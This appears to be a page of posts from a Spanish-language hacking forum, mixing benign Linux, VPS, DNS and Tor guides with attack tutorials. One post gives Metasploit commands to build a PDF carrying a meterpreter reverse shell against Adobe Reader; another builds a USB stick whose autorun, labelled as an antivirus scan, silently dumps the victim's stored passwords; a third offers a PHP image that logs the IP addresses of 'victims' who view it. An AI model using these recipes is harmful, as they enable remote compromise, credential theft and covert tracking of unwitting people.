Para los ya familiarizados en el tema podéis comprobar que de una versión a otra hay cambios siempre y aquí podemos ver uno muy notable gráficamente.



Como supongo que este manual lo están leyendo usuarios nuevos en Linux, vamos a facilitar las cosas aun mas simplemente usando la tercera opción Guiado para que ocupe el resto del disco que dejamos libre.



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Seleccionamos la tercera opción y continuamos con el botón Adelante ...


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Rellenamos las casillas con el nombre de usuario que queramos usar en esta maquina, password y nombre para el equipo continuando con el botón Adelante ...



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Ignoramos esta opción ya que el Windows XP que instalamos antes está nuevo y no hay nada para migrar. Continuamos con el botón Adelante ...


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


En esta ventana nos muestra información sobre todo lo que el sistema va a hacer. Una vez revisado que todo esté correcto continuamos con el botón Instalar ...


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



El proceso de instalación puede variar dependiendo de la conexión a Internet que tengas y de lo rápida que sea tu maquina. Si no tienes conexión a Internet no hay problema, pero es recomendable que si estabas conectado a tu Router dejalo como estaba y si no pues tranquilo ya este proceso se toma su tiempo ...



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Si ves que se demora mucho no desesperes ...


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Una vez completado el proceso de instalación pulsamos sobre el botón Reiniciar ahora y el sistema se cerrará hasta explusarnos el CD de instalación de Linux Ubuntu. Extraemos el CD y pulsamos la tecla Enter ...



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Como podeis ver nos aparece un menú donde nos deja escojer que sistema operativo queremos arrancar. Como este manual ha sido creado para introducir a los usuarios de Windows hacia Linux sin tener miedo de no volver otra vez a su sistema si es que hay algo que no sepan hacer en Windows vamos a arrancar nuestro nuevo Linux Ubuntu seleccionándolo y pulsando la tecla Enter ...



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Cargando ...


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Para iniciar el sistema debemos introducir los datos que anteriormente en la instalación le dimos para el usuario


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Y listo !!! Tan solo nos queda conectar el cable de red y ya lo tenemos preparado para funcionar.


Despues de unos minutos este es el aspecto de mi distribucion Linux Ubuntu recien instalada


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Podeis tocar, probar, examinar, indagar, trastear y lo que se os ocurra ya que si algo se rompre siempre estará aquí este manual sobre como se instalar Windows XP y Linux Ubuntu en el mismo ordenador. No tengais miedo y tocarlo todo para aprender ya que ahora teneis una carta en la manga, bueno mejor dicho en Internet.


Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#182
Hacking / Infectar PDF [Video Tutorial]
Agosto 24, 2011, 10:15:55 AM
Hola amigos aqui les dejo un vídeo donde se muestra la manipulación del Metasploit para obtener un PDF malintencionado que al abrirlo devuelve una shell que se conectar al atacante. El exploit mencionado afecta a las versiones de Adobe Reader v8.x, v9.x y a Windows XP SP3(2,1,0). Al final explico cada paso que se llevo a cabo en el vídeo:

Video Youtube:




Aquí está el comando y entre corchetes [] la explicación:

Código: text
Shell - Konsole
use exploit/windows/fileformat/adobe_pdf_embedded_exe [El exploit para ejecutar un el PAYLOAD al abrir un PDF]
set FILENAME nombre_salida.pdf [El nombre que tendrá el PDF una vez modificado por msf]
set INFILENAME /root/nombre_entrada.pdf [El nombre del PDF que será infectado]
set OUTPUTPATH /root/ [Directorio donde se guardará el PDF]
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.150.128 [IP que estará a la escucha para que se conecte el PAYLOAD]
set LPORT 4455 [Puerto a la escucha]
set id 0 [El S.O. y la versión del Adobe Reader que vulnera el exploit]
exploit

Ya le dijimos al PDF donde se conectara y en que puerto, ahora hay que poner el MSF a la escucha:

Shell - Konsole
back ["Atrás", dejamos de usar el exploit actual]
use exploit/multi/handler [El exploit para recibir a nuestro PAYLOAD]
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.150.128 [IP de nuestra máquina]
set LPORT 4455 [Puerto donde se conectarán]
set id 0 [Definimos los parametros del exploit]
exploit


Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#183
GNU/Linux / Revive tu PC vieja con Lubuntu
Agosto 19, 2011, 05:11:39 PM
Todos en casa, o al menos muchos guardamos en una esquina ese viejo ordenador, que por ser de hace algunos años ha quedado obsoleto, quizas con un viejo Windows 98. y nos preguntamos; Que hacer con ese pedazo de chatarra?

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Ningun sistema Operativo, mas que algunas distros de linux muy light soportan tecnologias tan antiguas, sin embargo, dichas distros usualmente no estan diseñadas para ser, "Amigables". Es por eso, que hoy vengo a presentarles un proyecto de la familia de Ubuntu. Y su nombre es Lubuntu


&nbsp;


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Lubuntu No es mas que una distribucion derivada de Ubuntu, su lema es "menos recursos y más eficiencia energética" Usa un entorno de escritios LXDE y El nombre Lubuntu es una combinación entre LXDE y Ubuntu.

Ademas de ser una distribucion que tiene unos requerimientos minimos apenas superiores a los de windows 98, es ideal para netbooks o miniportatiles de ultima generacion, es "Eficiente" en cuanto al consumo de enrgia. digamos "verde"


[/url]


Pero no se confundan, el no devorar recursos del sistema, no quiere decir que la interfaz sea poco amigable para el usuario. por el contrario, tiene un look, muy clean. Que convertira nuestro viejo PC en uno corriendo un S.O de ultima generacion

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Si bien el sistema operativo no require mas de unos 50mb de ram para funcionar bien, el software adicional, Si requiere algunos recursos adicionales, sobre todo software como Firefox. Es por ello, que en Lubuntu, vemos una siute de elementos optimizados para el maximo desempeño en una maquina con recursos limitados.

Alternativas como Open Office son relativamente "Pesadas" en contraste con el lema de Lubuntu, por lo que no se incluyen por defecto con la distribucion, Que cuenta con una suite de oficina un poco mas "ligera"

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Entre el software que incluye el .iso se incluye lo necesario para hacer revivir esa vieja PC y hacerla totalmente operativa.


  • Reproductores multimedia
  • Clientes de Mensajeria instantanea
  • Clientes Bittorrent
  • Suite de Oficina
  • Navegador web Firefox
  • Editor de Imagenes
Entre otros...

Es una buena opcion para que saques provecho aun al hardware que tienes olvidado tras haberse vuelto "Obsoleto" El iso, pesa solo 350 mb, por lo que es extremadamente liviano, adicionalmente. Es Live-CD por lo que puedes probar la distro sin instalarla siquiera.


Lubuntu ha sido probado en:




Así que si tu PC, supera o bien tiene capacidades similares a las antes mencionadas, que estas esperando?

Link de Descarga: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta(aun en fase alfa)
Para mas Informacion: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Via: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

También disponible el escritior LXDE desde synaptic, si tienes Ubuntu, pero deseas que tu PC vuele.


NOTA DEL AUTOR: Tambien esta disponible Xubuntu, como una alternativa para Revivir una vieja PC, sus requerimientos minimos son algo superiores a los de Lubuntu, pero igual, muy bajos.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Procesador : Pentium II
Ram : 64Mb (Si se instala con el alternate CD)

Disco duro : 1.5GB 
Web Oficial : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Comentarios : Basada en Ubuntu, es una de las mas conocidas y posee un balance perfecto entre capacidades, apariencia y rendimiento. Se acutualiza cada 6 meses.


Descarga : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Cuenta con versiones estables que salen cada 6 meses, por lo que es una excelente alternativa si quieres probar algo mas robusto y estable.

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#184
Cuando deseamos crear un Cd ROM y queremos que este se auto ejecute al introducirlo en la unidad de CD / DVD tenemos que incluir un pequeño archivo en el Directorio del CD. El archivo en cuestión se llamaría AUTORUN.INF . En este manual os daré unos ejemplos de como realizarlo

Este pequeño archivo se crea con el bloc de notas, y una vez creado lo renombramos a AUTORUN.INF el contenido que debemos introducir dentro del archivo es el siguiente:

Código: text
[autorun]
open=archivo.exe
icon=archivo.ico


Donde pone "archivo.exe" se tiene que poner el nombre del archivo a ejecutar y donde pone "archivo.ico" ponemos el icono del CD-ROM que veremos al mostrar el contenido de "MiPC".

Ejemplo:

CREAR UN AUTORUN PARA PÁGINA WEB
Para crear un Autorun para una página web, es necesario especificar otro archivo de Windows para que pueda abrir la página, es decir, el Explorador de Windows.

Si no lo haces así y grabas el CD, cuando quieras que se inicie el Autorun, te dirá que no es una aplicación Win32 válida. Por tanto, ten en cuenta estas explicaciones, y sigue el ejemplo que hay más abajo:

Código: text
[autorun]
OPEN=\windows\explorer.exe nombre_página_web.html
ICON=Nombre_archivo_icono.ico


Fíjate que en el comando OPEN, entre explorer, exe y nombre_página_web.html, hay un espacio. nombre_página_web.html = el nombre de la página web que desee que inicie el autorun
Nombre_archivo_icono.ico = debe introducir el nombre el archivo del icono.

Por ejemplo, si quieres hacer un autorun para un CD, y que el Autorun te inicie una página web llamada "index.html", con un icono para el CD, llamado "icoCD.ico". Tendrás que hacer lo siguiente:

Código: text
[autorun]
OPEN=\windows\explorer.exe index.html
ICON=icoCD.ico


Puede que lo que quieras que se ejecute sea un archivo de una determinada aplicación, como por ejemplo un archivo html (o cualquier otro archivo que quieras), entonces tendrás que crear además un archivo BAT (por lotes) que haga que el archivo de la aplicación se pueda auto ejecutar. Los pasos serán primero crear el archivo bat con el bloc de notas, que por ejemplo lo llamamos auto.bat y estará constituido por las dos líneas siguientes:

Código: text
@explorer Indice.htm
@exit


Donde "Indice.htm" es el nombre del archivo que tengas (si es un archivo del Word sería por ejemplo :@explorer chistes.doc, se admite cualquier archivo de windows y siempre que el ordenador donde se use el CD tenga el programa que abre dicho archivo).

Luego debes crear el archivo autorun.inf:

Código: text
[autorun]
open=auto.bat
icon=Dibujo.ico


Ambos archivos irán en el directorio raíz, así como el archivo htm.

Consejo: antes de grabar el CD pon el archivo "auto" y el archivo que quieras que se abra dentro de la misma carpeta de tu disco duro y ejecuta el archivo .bat para comprobar que abre la aplicación con el archivo elegido, si es así cuando grabes el CD y pongas los 3 archivos anteriores en el directorio raíz no fallará, si no se abre comprueba si tu archivo por lotes .bat realmente tiene extensión .bat y no es "auto.bat.txt" y su contenido es correcto.



AÑADIR OPCIONES AL MENÚ CONTEXTUAL

Otra cosa que se puede hacer desde el fichero AUTORUN.INF es añadir opciones al menú de contexto del CD-ROM (el que sale al pulsar con el botón secundario sobre el icono del CD). Puede resultar interesante dar la opción de "Explorar el contenido del CD" o "Iniciar la instalación de... (un programa cualquiera)". Esto también es fácil:

Código: text
[AUTORUN]
OPEN=SHELEXEC.EXE <fichero>
ICON=<icono>

SHELL\EXPLORAR=Explorar el contenido del CD-ROM
SHELL\EXPLORAR\COMMAND=EXPLORER.EXE /E,\

SHELL\HTML=Ver índice HTML del CD-ROM
SHELL\HTML\COMMAND=SHELEXEC.EXE INDICE.HTM


El truco consiste en crear parejas de líneas "SHELL\<clave>" y "SHELL\<clave>\COMMAND" poniendo en la primera el texto que queremos que aparezca en el menú de contexto, y en la segunda la instrucción que queremos que se ejecute al seleccionar la opción.
#185
Bueno, hace un par de días, por fin, conseguimos el dinero que necesitábamos para contratar un VPS por 6 meses. Pensando en implementarlo en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. personalmente, pensé que se trataba de algo muy sencillo, y es el momento, no había trabajado con mas que con servidores compartidos.





Cual fue mi sospresa cuando descubri que mi VPS no incluia ningun panel de control.&nbsp;

Mucho mas frustrante fue el hecho de no encontrar documentacion apropiada y en espa&ntilde;ol para configurar mi servidor. Asi pues. Me decidi a escribir un articulo, quizas algo extenso pero que incluya mi experiencia personal. Quizas pueda ser de utilidad a alguien en mi situacion.


Contratando un VPS
   
Es importante considerar, a la hora de contratar un servidor privado cuales son nuestras necesidades especificas. Visitar diferentes proveedores de hosting y ponerse en contacto con ellos para plantear preguntas especificas sobre el script que planeamos instalar, y el uso que pensamos darle al servidor. Para No tienes permitido ver los links. Registrarse o Entrar a mi cuenta el servidor que mas se adecuo a nuestras necesidades fue No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
   
Ahora, contratar un VPS requiere un proceso mas extenso de verificacion, cabe se&ntilde;alar que un VPS es bastante mas costoso que un servidor compartido comun y corriente. es por eso, que considere, que el Level 2. se adecuaba a mis necesidades.



   No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Ahora, Si quisieras obviar este tutorial. Podrias contratar un VPS configurado con Cpanel, pero claro que su costo es mayor.&nbsp;
   
   
El Panel de Control
   
Una vez que hayas concluido con la contratacion del servicio, tu proveedor de hosting te brindara algunos detalles importantes, en mi caso, al contratar un VPS con el panel VZ he recibido los siguientes detalles:




No tienes permitido ver los links. Registrarse o Entrar a mi cuenta




Entre los detalles suministrados, podemos observar el Power Panel (VZ), Vamos a apuntar nuestro navegador para acceder al Panel de control. Una vez nos hayamos logeado, veremos algo como esto:


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Probablemente, las secciones que mas utilizaremos durante este tutorial, seran la Administracion de Archivos y la conexion SSH. Ahora, cabe mencionar, que dicho panel de control, sirve de escritorio virtual a nuestro VPS.&nbsp;

En general, tenemos acceso root al sistema, es decir al propio sistema operativo de nuestro servidor. Cabe mencionar que en mi caso, mi sistema operativo es CentOS.&nbsp;

Ahora, si bien tener acceso root es algo exelente, pues no tenemos limitantes en cuanto al software que deseemos instalar. Implica que todas las pre-configuraciones a las que estamos acostumbrados en los hosting compartidos no existen. Porque NOSOTROS seremos en esta ocasion los sysadmin. Es decir, quienes debemos configurar el sistema.



Instalando Apache, PHP, MySQL, Filezilla y phpMyAdmin
   
Es probablemente la parte mas complicada del tutorial, al menos fue la parte que me resulto mas problemática. Trabajando en un SO desconocido, tanto en su sitnaxis como en su estructura. La verdad resulto un proceso un poco mas complejo de lo esperado. Sin embargo, Aqui lo resumo y les evito googlear lo que yo google para encontrar algunas respuestas.
   
Es probable que su servidor, venga preconfigurado con apache instalado. En Hostgator, es asi, sin embargo, php y mysql no estaban instalados, por lo que hubo que hacerlo manual. Ahora. Personalmente, decidi utilizar xampp, por haberlo usado antes en Ubuntu. Ademas de ser mi SO algo antiguo y sus repositorios estar obsoletos. (teniendo en cuenta que no se absolutamente nada de CentOS tampoco pude actualizar la lista)
   
Bien, manos a la obra; vamos a ir a nuestro panel de control, en la pesta&ntilde;a Conexion SSH.. y nos logearemos con los datos que nos ha suministrado nuestro proveedor de servicio.



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Es solo la terminal de nuestra distribucion, y todas las operaciones deberemos realizarlas a travez de esta pantallita, para quienes no estamos acostumbrados a trabajar en &quot;modo-texto&quot; puede ser algo incomodo, pero resulta que la adaptacion es mucho mas rapida.
   
Vamos a obtener xampp desde nuestro servidor, para eso nos dirigiremos a la carpeta&nbsp; /opt escribiendo en la terminal

    cd /opt


Una vez hecho esto, vamos a a escribir

    wget No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Veremos el proceso de descarga desde nuestra terminal, se descargara un paquete que pesa unos 60mb, sin embargo con la velocidad de descarga de nuestro servidor 5 o 7 mbs/s no tardara mas de unos segundos en completarse la operacion.

Ahora, vamos a descomprimir el archivo, para eso vamos a escribir en nuestra terminal.

    tar xzf xampp-linux-1.5.4a.tar.gz


Si todo ha salido bien, podremos ver desde nuestro gestor de archivos en el VZ power panel, algo asi:
   

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Eso significa que hemos instalado correctamente xampp, pero ahora, debemos detener nuestro servidor apache, si es que esta corriendo para poder iniciarlo desde lampp, para eso vamos a escribir en la terminal

    /etc/init.d/httpd stop

Nos deberia de aparecer un mensaje diciendo que se ha detenido el servicio con exito, ahora vamos a iniciar lampp

    /opt/lampp/lampp start


Si todos los servicios se han iniciado correctamente, enhorabuena! hemos logrado instalar apache, php, mysql, phpmyadmin, y filezilla.


Pero claro, Seria muy facil si todo hubiera funcionado tal y como se esperaba que funcionara. Sin embargo, es muy posible que hayan surgido ciertos problemas.


Posibles Problemas

XAMPP: Another MySQL daemon is already running

Significa que hay un servicio MySQL ejecutandose y debe detenerse, esto se puede hacer facilmente escribiendo

    /etc/init.d/mysqld stop


Eventualmente veriamos un mensaje que indique, el servicio se ha detenido, pero tambien existe la posibilidad de que el servicio no se pueda detener y nos aparezca un tragico [FAIL]

Para solucionar este problema, vamos, en primer lugar a reinstalar mysql, para despues poder detenerlo. Asi pues, vamos hacer lo siguiente:

1.

    yum -y remove mysql mysql-server

2.

    yum install mysql mysql-server

3.

     /etc/init.d/mysqld stop


4.

    yum -y remove  mysql mysql-server


5.

    rm -rf /var/lib/mysql


6.

     chmod 1777 /tmp

7.

      yum  -y install mysql mysql-server


8.

    /etc/init.d/mysqld restart


9.

    /etc/init.d/mysqld stop


Si se pudo detener con exito el servicio, entonces ahora si podran iniciar lampp escribiendosi el servicio lo habian logrado iniciar

    /opt/lampp/lampp restart


Y si lo habian detenenido, bastara con escribir

    /opt/lampp/lampp start



Una vez hemos logrado que el sitio se inicie correctamente, podriamos visualizarlo desde la IP que nuestro proveedor de hosting nos asigno, sin embargo, es posible que nos encontremos con un mensaje indicandonos que nuestro sitio solo es accesible desde una red local.
   
   
Configurando XAMPP
   
Esto es por un nuevo moldulo que ha implementado Xampp, para poder desbloquearlo, vamos a dirigirnos desde nuestro gestor de archivos en el panel de control a /opt/lampp/etc/extra/httpd-xampp.conf
   
Veremos algo como esto:
   

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Y lo que haremos sera comentar la linea que dice:
   
   &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Deny from all
   
   La dejaremos asi:
   
   &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; #&nbsp;&nbsp;&nbsp; Deny from all
   
   Una vez realizado este cambio, podremos acceder a nuestro sitio a travez de nuestra IP, y veremos algo como esto:
   &nbsp;

   No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Sin embargo, coincidiran conmigo en que esto es sumamente inseguro, por eso, vamos a asignar contraseña al directorio http://suip/xampp y a todos los servicios derivados de este paquete, para eso vamos a ejecutar en nuestra terminal

Citar
opt/lampp/lampp security



Un asistente nos ayudara con el proceso de asegurar nuestra instalacion de xampp
   
   XAMPP: Quick security check...
   XAMPP: Your XAMPP pages are NOT secured by a password.
   XAMPP: Do you want to set a password? [yes] yes (1)
   XAMPP: Password: ******
   XAMPP: Password (again): ******
   XAMPP: Password protection active. Please use 'lampp' as user name!
   XAMPP: MySQL is accessable via network.
   XAMPP: Normaly that's not recommended. Do you want me to turn it off? [yes] yes
   XAMPP: Turned off.
   XAMPP: Stopping MySQL...
   XAMPP: Starting MySQL...
   XAMPP: The MySQL/phpMyAdmin user pma has no password set!!!
   XAMPP: Do you want to set a password? [yes] yes
   XAMPP: Password: ******
   XAMPP: Password (again): ******
   XAMPP: Setting new MySQL pma password.
   XAMPP: Setting phpMyAdmin's pma password to the new one.
   XAMPP: MySQL has no root passwort set!!!
   XAMPP: Do you want to set a password? [yes] yes
   XAMPP: Write the passworde somewhere down to make sure you won't forget it!!!
   XAMPP: Password: ******
   XAMPP: Password (again): ******
   XAMPP: Setting new MySQL root password.
   XAMPP: Setting phpMyAdmin's root password to the new one.
   XAMPP: The FTP password for user 'nobody' is still set to 'lampp'.
   XAMPP: Do you want to change the password? [yes] yes
   XAMPP: Password: ******
   XAMPP: Password (again): ******
   XAMPP: Reload ProFTPD...
   XAMPP: Done.


Recuerden anotar todos estos passwords conforme los vallan colocando.

Ahora, podemos acceder a nuestro servidor utilizando un cliente FTP, por ejemplo Filezilla o bien CuteFTP, escribiendo en &quot;host&quot; o &quot;server&quot; la IP de nuestro sitio, en user, escribimos &quot;nobody&quot; y en &quot;password&quot; el password que le asignamos al user nobody durante la configuracion de seguridad de xampp.&nbsp;


Instalando un panel de control

Un panel de control es sumamente util para gestionar algunos recursos del servidor que de otra manera pueden ser algo tediosos, por eso, vamos a instalar el panel de control webmin. Hasta aqui llegara el tutorial, ya el resto es mas sencillo y la verdad este tutorial se alargo un poco.

Si queremos utilizar webmin tenemos que instalar perl (un lenguaje de programacion usado por webmin) openssl (para acceder a las paginas de webmin de modo seguro) y perl-Net-SSLeay, una extension en perl para el uso de openssl. Instalamos los programas necesarios con el comando (distribucion centos):



Citar
yum install perl openssl openssl-devel perl-Net-SSLeay



Creamos una carpeta donde vamos a instalar webmin


Citar
mkdir /opt/lampp/htdocs/webmin



Nos posicionamos en la carpeta /usr/src y escribimos el siguiente comando:


Citar
cd /usr/src


Descargamos el Webmin


Citar
wget No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Decomprimimos el programa:



Citar
tar -xf webmin-1.500.tar.gz



entramos en la carpeta creada desde la consola:


Citar
cd webmin-1.510



E iniciamos la instalacion


Citar
./setup.sh /usr/local/webmin


damos Enter
   
aparecera: Log file directory [/var/webmin]
   
damos Enter
   
aparecera: Full path to perl (default /usr/bin/perl):
   
damos Enter
   
aparecera: Web server port: (default 10000):
   
escribimos 25000 y damos Enter




Escogemos un nombre de usuario de administrador, una contrasena, la repetimos, elegimos usar SSL (opcional) y le decimos que queremos que webmin arranque al boot de nuestro servidor linux.
   
Una vez terminada la instalacion podremos empezar a usar nuestro sistema de administracion abriendo Firefox (o otro navegador) y apuntando a:&nbsp;


www.example.com:25000




No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Ahora, para poder agregar su dominio desde el panel de control, esta en dependencia de sus dns y su configuracion personal, sin embargo, puede serles util esta información: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Espero este tutorial les haya sevido, y se eviten tantos problemas a la hora de configurar su VPS, como siempre a la espera de sus comentarios
   
Un Saludo
MzStudios
Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#186
Hacking / Tutorial - Crear USB Roba Datos
Agosto 12, 2011, 03:06:53 PM
Este es un nuevo método para crear un USB Roba Datos el cual será un pequeño Stealer que se ejecutará por autorun. Aviso de que si está desactivado no funcionará.


Utilizaremos los siguientes programas (cada uno utilizará una función distinta):

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Vamos a descomprimir los archivos y a colocar el ejecutable en la raíz del dispositivo de almacenamiento USB.


Ahora creamos un código en Batch para que ejecute los programas:

Código: text
    
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt



Ahora crearemos el autorun que se tendrá que guardar como "autorun.inf"

Código: text
    
[autorun]
open=launch.bat
ACTION= Realizar Escaner Antivirus



Listo, nuestro USB ahora cada vez que lo introduzcamos en un PC nos guardará en archivos de texto las passwords almacenadas.


Autor: The_Maxu
Redactado: Stiuvert

Saludos
#187
   Advanced Onion Router permite el uso de habilitar conexiones seguras y an&oacute;nimas con cualquier aplicaci&oacute;n que se conecta a Internet. Con frecuencia atraviesan cortafuegos y la censura sitio web. A diferencia de los clientes similares que requieren un proxy configurable, AOR es capaz de &ldquo;forzar&rdquo; un programa para utilizar la red Tor.


   &iquest;Pero como usarlo?


   Primero vamos ejecutar el programa as&iacute; que lo descomprimimos el rar en el escritorio


   Ejecutamos el AdvOR


   Una vez abierto&nbsp; vamos a donde dice connect y expramos a que se llene la barra


   


   Damos a la flecha a la par de New Identify


   


   Elegimos el pa&iacute;s que queramos y ya esta


   


   Ahora voy a explicar c&oacute;mo configurarlo para que funcione en el navegador firefox,opera o chrome


   En firefox hacemos lo siguiente


   1. Damos al bot&oacute;n firefox


   2. vamos a opciones y opciones


   3.en la ventana buscamos &ldquo;Avanzado&rdquo; y pesta&ntilde;a &ldquo;Red&rdquo;


   4. vemos que dice &ldquo;configurar modo en que firefox se conecta a Internet&rdquo; damos en &ldquo;configuraci&oacute;n&rdquo;


   5.ponemos el que dice configuraci&oacute;n manual de proxy


   10.Ponemos esto &ldquo;Proxy HTTP: 127.0.0.1 Puerto:9050 &rdquo;


   11. por ultimo ponemos la opci&oacute;n &ldquo;Usar el mismo proxy para todos&rdquo; y damos acepta


   para desactivarlo damos en &ldquo;sin proxy&rdquo;


   en chrome hacemos lo siguiente:


   tenemos que instalar este complementoNo tienes permitido ver los links. Registrarse o Entrar a mi cuentaNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta


   Una vez instalado tenemos que configurarlo


   Damos click derecho a la imagen y damos en opciones


   despu&eacute;s en proxy profiles ponemos esto:


   profile name: el que quieran


   Manual Configuraci&oacute;n ponemos esto: 127.0.0.1&nbsp; Port: 9050


   Queda as&iacute;


   


   para navegar an&oacute;nimo tiene que estar el programa AdvOR obviamente y dar click al paneta ,seleccionar el nombre que pusimos al proxy as&iacute;:


   


   Una vez que cargo la p&aacute;gina con el proxy este se desactiva autom&aacute;ticamente as&iacute; que si quieren navegar an&oacute;nimo en otra p&aacute;gina de ven hacer lo mismo.


   Y por &uacute;ltimo en opera&nbsp; asemos lo siguiente:


   1. Damos al bot&oacute;n opera


   2. vamos a configuraci&oacute;n y opciones


   3. vacamos la pesta&ntilde;a&nbsp; &ldquo;Avanzado&rdquo; y&nbsp; &ldquo;Redes&rdquo;


   4. damos donde dice servidores proxy


   5. donde dice HTTP ponemos 127.0.0.1 pueto: 9050


   10. y damos en usar proxy para todos los protocolos aceptar y listo


   11. para desactivarlo quitamos el check del HTTP


   Una de las mejores caracter&iacute;stica de&nbsp; AdvOR es que puedes navegar sin que te detecten que estas usando un proxy:


   


   adem&aacute;s si queremos forzar a un programa para que funcione con AdvOR lo podemos hacer seleccionando el icono y arrastr&aacute;ndolo al programa que queremos forzar (no es recomendable usarlo en los navegadores)


   

#188
Back-end / Sacar IP mediante Web o Imágen en Php
Julio 31, 2011, 03:58:53 PM
Código: php
<?php 
Header("Content-type: image/png");
$im = ImageCreate(300, 300);
$red = ImageColorAllocate($im, 255, 0, 0);
$white = ImageColorAllocate($im, 255, 255, 255);
$blue = ImageColorAllocate($im, 0, 0, 255);
$black = ImageColorAllocate($im, 0, 0, 0);
ImageFill($im, 0, 0, $red);
ImageString($im, 10, 10, 10, "Hola DragonJar", $black);
$font_width = ImageFontWidth(10);
$string_width = $font_width * (strlen("Hola! DragonJAR!"));
ImageLine($im, 100, 50, (100+$string_width), 50, $black);
ImagePng($im);
$nombre_archivo = 'log.html';
if($_SERVER["HTTP_X_FORWARDED_FOR"]){
$contenido = $_SERVER["HTTP_X_FORWARDED_FOR"]."<br/>";
}else{
$contenido = $_SERVER["REMOTE_ADDR"]."<br/>";
}
       
if (is_writable($nombre_archivo)) {

    if (!$gestor = fopen($nombre_archivo, 'a')) {
         echo "Error";
         exit;
    }

    if (fwrite($gestor, $contenido) === FALSE) {
        echo "Error";
        exit;
    }
   
    echo "Exito";
   
    fclose($gestor);

} else {
    echo "Error";
}
?>



Suben por FTP el Index.php y crean un HTML con el nombre de "log.html" y también lo suben.

Envían la página a la victima o bien si están en un Foro en tu Perfil eliges la opción "Subir por Link tu imagen y añades esto: url-de-tu-ágina/index.php

Los Logs los verás en: url-de-tu-página/log.html


Saludos
#189
Redes y antenas / Cómo cambiar los DNS
Julio 27, 2011, 04:14:32 PM
    Cómo cambiar los DNS

    DNS son las siglas de Domain Name System o Sistema de Nombres de Dominio. Los servidores DNS se encargan de traducir los nombres de dominio, como por ejemplo No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, en su dirección IP, que es el número que identifica al servidor al que se manda la petición. Dicho de forma sencilla, el DNS sería un listín telefónico en el que buscando el apellido de una persona (bandaancha.eu) obtenemos su número de teléfono (89.248.106.100).

    ¿Cómo afectan las DNS a la velocidad de mi conexión?

    Las DNS únicamente intervienen en el momento en el que se establece la conexión entre dos ordenadores (Ej.: al entrar en una web). Cuando el navegador tarda mucho tiempo en encontrar una web (en IE pone "Buscando sitio: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta" en la barra de estado) suele ser, bien porque nuestro DNS primario está caído o por alguna otra razón (saturación de usuarios, etc.) tiene un tiempo de respuesta muy alto. Los DNS no influyen mientras se está transmitiendo la información, como cuando se descarga un archivo de una web. Por lo tanto, poner unos buenos DNS mejorará la velocidad de navegación, pero no la de transferencia.


    ¿Debo cambiar las DNS que me da mi operadora?

    En la configuración del TCP/IP se pueden especificar en una lista, que DNS queremos utilizar. Para resolver un nombre de dominio, nuestro sistema envía la consulta al primer DNS que aparece en la lista. En el caso de que no esté operativo, va descendiendo y realizando consultas al resto de DNS según el orden en el que aparecen, hasta que encuentra uno que responda.

    Suele ocurrir muchas veces que la conexión ADSL esta operativa y sin embargo si intentamos acceder a una URL correcta nos pone "No se pudo encontrar el servidor o error DNS". Esto es debido a que en ese momento todos los DNS que aparecen en la lista están caídos. Para solucionar esto solo hay que cambiar los DNS por otros que funcionen.

    En principio es recomendable utilizar los DNS de nuestra operadora, ya que las consultas tendrán que pasar por menos nodos y suelen dar un mejor tiempo de respuesta. Solo en el caso de que los de nuestra operadora estén muy ocupados es conveniente utilizar otros externos. Otra solución consiste en utilizar DNS no públicos. Muchas veces las operadoras disponen de más DNS aparte de los que dan a sus usuarios y que suelen estar menos saturados.


    Windows 7 y/o Windows Vista


    [list=1]
